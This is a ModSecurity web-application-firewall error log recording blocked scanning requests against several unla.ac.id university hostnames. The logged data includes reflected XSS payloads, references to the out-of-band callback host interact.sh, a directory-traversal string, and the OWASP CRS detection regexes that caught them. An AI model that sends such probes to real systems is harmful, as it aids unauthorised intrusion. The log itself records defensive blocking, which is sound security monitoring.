[Tue Aug 29 11:56:54.659099 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RcAAAAS"]
[Tue Aug 29 11:56:54.697703 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RkAAAAS"]
[Tue Aug 29 11:56:54.716819 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RoAAAAS"]
[Tue Aug 29 11:56:54.737390 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RsAAAAS"]
[Tue Aug 29 11:56:56.118860 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArB17EAAAAV"]
[Tue Aug 29 11:56:56.214956 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAoz8SYAAAAS"]
[Tue Aug 29 11:56:56.215028 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArB17YAAAAV"]
[Tue Aug 29 11:56:56.229530 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAq-HjoAAAAT"]
[Tue Aug 29 11:56:56.256842 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAolK@MAAAAe"]
[Tue Aug 29 11:56:56.697192 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAolK@oAAAAe"]
[Tue Aug 29 11:56:56.774727 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16mMCo-f0AAAolK@0AAAAe"]
[Tue Aug 29 11:56:57.635558 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAoz8TYAAAAS"]
[Tue Aug 29 11:56:57.637004 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq5@Y4AAAAK"]
[Tue Aug 29 11:56:57.678692 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq-HkIAAAAT"]
[Tue Aug 29 11:56:57.700673 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAArB18IAAAAV"]
[Tue Aug 29 11:56:57.739262 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAArB18QAAAAV"]
[Tue Aug 29 11:56:59.432678 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16m8Co-f0AAAq-HlMAAAAT"]
[Tue Aug 29 11:56:59.740293 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8VsAAAAS"]
[Tue Aug 29 11:56:59.747808 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAArbWQYAAAAG"]
[Tue Aug 29 11:56:59.761029 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8VwAAAAS"]
[Tue Aug 29 11:56:59.827087 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8V8AAAAS"]
[Tue Aug 29 11:56:59.847019 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8WAAAAAS"]
[Tue Aug 29 11:57:00.595165 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAoz8WIAAAAS"]
[Tue Aug 29 11:57:00.599883 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAArB19MAAAAV"]
[Tue Aug 29 11:57:00.806591 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAArB19UAAAAV"]
